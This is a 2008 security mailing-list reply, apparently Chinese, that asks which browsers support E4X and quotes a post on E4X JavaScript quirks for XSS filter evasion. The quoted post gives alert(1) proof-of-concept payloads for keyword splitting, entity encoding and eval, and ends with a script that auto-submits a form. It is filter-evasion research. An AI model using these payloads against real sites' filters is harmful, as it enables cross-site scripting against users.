啥浏览器支持 E4X? 2008/9/8 大风 <[EMAIL PROTECTED]> > > > If you've not been following my sla.ckers thread on unusual > javascript<http://sla.ckers.org/forum/read.php?2,15812>then your missing out. > My idea was to gather interesting, weird and > wonderful javascript tricks which are useful for filter evasion and coding. > I investigated E4X quite a lot for this purpose and found a few cool things > that I'll share with you. > *Using {} for keyword evasion* > > Lets say a filter disallows certain words, because the {} allows you to > execute a javascript block; if you execute a block that returns a blank > string then you can use it for keyword evasion. The new array constructor > creates a blank array but when used in concatenation it results in a blank > string. > > location=<text>javascr{*new* Array}ipt:aler{*new* Array}t(1)</text> > > Another example:- > > location=<text>javascr{[]}ipt:aler{[]}t(1)</text> > > *Weird syntax fun* > > E4X also has some javascript syntax quirks that normally would cause a > parsing error but it's perfectly valid. > > *default* xml *namespace* = alert(1) > > Some more weird looking stuff:- > > <>{*eval*(/alert(1)/[-1])}</|>>[EMAIL PROTECTED]::xyz > > ([EMAIL PROTECTED]::abc?alert:[EMAIL PROTECTED]::xyz)(1) > > *Numbers as E4X* > > For some reason numbers can be used as XML > > [EMAIL PROTECTED]/(are=1)%1..*::xml > > *Encoding with entities* > > Giorgio <http://hackademix.net/> brought this to my attention when he was > hacking my unsuccessful Firefox sandbox experiment. You can use html > entities and they will be decoded when using the XML data as strings. > > alert(<>"</>) > > A more interesting example with decimal entities:- > > *eval*(<>alert(1)</>+[]) > > Hackvertor supports morphs which allow you to generate this sort of data > automatically, useful for fuzzing XSS filters:- > E4X > morph<http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PEBlNHhfZGVjX21vcnBoX2Z1bGxfMz5hbGVydCgxKTxAL2U0eF9kZWNfbW9ycGhfZnVsbF8zPg%3D%3D> > *Form creation* > > Making forms with E4X is lovely, check it out:- > > f=<form/>; > > [EMAIL PROTECTED]'x'; > > [EMAIL PROTECTED]'url.php'; > > [EMAIL PROTECTED]'post'; > > [EMAIL PROTECTED]'h' > > [EMAIL PROTECTED]; > > document.body.innerHTML=f; > > document.getElementById('x').submit(); > > > > > > *[Ph4nt0m] <http://www.ph4nt0m.org/> * > > *[Ph4nt0m Security Team]* > > * [EMAIL PROTECTED] <http://blog.ph4nt0m.org/>* > > * Email: [EMAIL PROTECTED] > > * PingMe: > <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=hanqin_wuhq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724> > * > > * **=== V3ry G00d, V3ry Str0ng ===*** > > * === Ultim4te H4cking ===* > > * === XPLOITZ ! ===* > > * === #_# ===* > > *#If you brave,there is nothing you cannot achieve.#* > > > > > > > >
--~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [EMAIL PROTECTED] -~----------~----~----~----~------~----~------~--~---
<<inline: image001.gif>>
